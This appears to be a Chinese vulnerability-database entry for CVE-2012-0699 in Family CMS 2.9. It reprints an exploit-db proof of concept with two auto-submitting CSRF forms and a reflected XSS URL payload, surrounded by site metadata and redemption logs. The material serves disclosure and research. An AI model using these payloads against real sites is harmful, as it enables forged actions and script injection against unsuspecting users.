Family CMS 2.9 and earlier multiple Vulnerabilities

基本字段

漏洞编号：: SSV-72726

披露/发现时间：: 2012-01-14

提交时间：: 2014-07-01

漏洞等级：

漏洞类别：: 其他类型

影响组件：

漏洞作者：: 未知

提交者：: Knownsec

CVE-ID：: CVE-2012-0699

CNNVD-ID：: CNNVD-201201-192

CNVD-ID：: CNVD-2012-9219

ZoomEye Dork：: 补充

来源

漏洞详情

贡献者 pony 共获得 0.35KB

共 4 兑换了

PoC (非 pocsuite 插件)

贡献者 Knownsec 共获得 0.65KB

Family CMS 2.9 and earlier multiple Vulnerabilities =================================================================================== # Exploit Title: Family CMS 2.9 and earlier multiple Vulnerabilities # Download link :http://sourceforge.net/projects/fam-connections/files/Family%20Connections/2.9/FCMS_2.9.zip/download # Author: Ahmed Elhady Mohamed # Email : ahmed.elhady.mohamed@gmail.com # version: 2.9 # Category: webapps # Tested on: ubuntu 11.4 =================================================================================== Tips: *****First we must install all optional sections during installation process.***** 1- CSRF Vulnerabilities : POC 1: Page "familynews.php" <html> <head> <script type="text/javascript"> function autosubmit() { document.getElementById('ChangeSubmit').submit(); } </script> </head> <body onLoad="autosubmit()"> <form method="POST" action="http://[localhost]/FCMS_2.9/familynews.php" id="ChangeSubmit"> <input type="hidden" name="title" value="test" /> <input type="hidden" name="submitadd" value="Add" /> <input type="hidden" name="post" value="testcsrf" /> <input type="submit" value="submit"/> </form> </body> </html> -------------------------------------------------------------------------------------------------------- POC 2:Page "prayers.php" <html> <head> <script type="text/javascript"> function autosubmit() { document.getElementById('ChangeSubmit').submit(); } </script> </head> <body onLoad="autosubmit()"> <form method="POST" action="http://[localhost]/FCMS_2.9/prayers.php" id="ChangeSubmit"> <input type="hidden" name="for" value="test" /> <input type="hidden" name="submitadd" value="Add" /> <input type="hidden" name="desc" value="testtest" /> <input type="submit" value="submit"/> </form> </body> </html> ---------------------------------------------------------------------------------------------------------------------------- 2-Reflected XSS POC : http://[localhost]/fcms_2.9/gallery/index.php?uid=%22%3E%3Cscript%3Ealert%28/xss/%29%3C/script%3E -----------------------------------------------------------------------------------------------------------------------------

共 7 兑换

参考链接

http://www.exploit-db.com/exploits/18667

解决方案

临时解决方案

官方解决方案

防护方案

暂无防护方案

cappuccino 兑换PoC
cappuccino 兑换漏洞详情
匿名兑换漏洞详情
匿名兑换PoC
匿名兑换漏洞详情
匿名兑换PoC
匿名兑换PoC
匿名兑换PoC
匿名兑换PoC
lightning1141 兑换漏洞详情
feng 兑换PoC

生命线

2012-01-14 发现/披露了漏洞
2014-07-01 提交了漏洞
2014-07-01 提交补充了漏洞详情
2014-07-01 提交更新了 PoC

基本字段

来源

漏洞详情

PoC (非 pocsuite 插件)

参考链接

解决方案

生命线

相关漏洞

评论前需绑定手机现在绑定

暂无评论

Family CMS 2.9 and earlier multiple Vulnerabilities

基本字段

来源

漏洞详情

PoC (非 pocsuite 插件)

参考链接

解决方案

生命线

相关漏洞

评论前需绑定手机 现在绑定

暂无评论

您好，

您好，

评论前需绑定手机现在绑定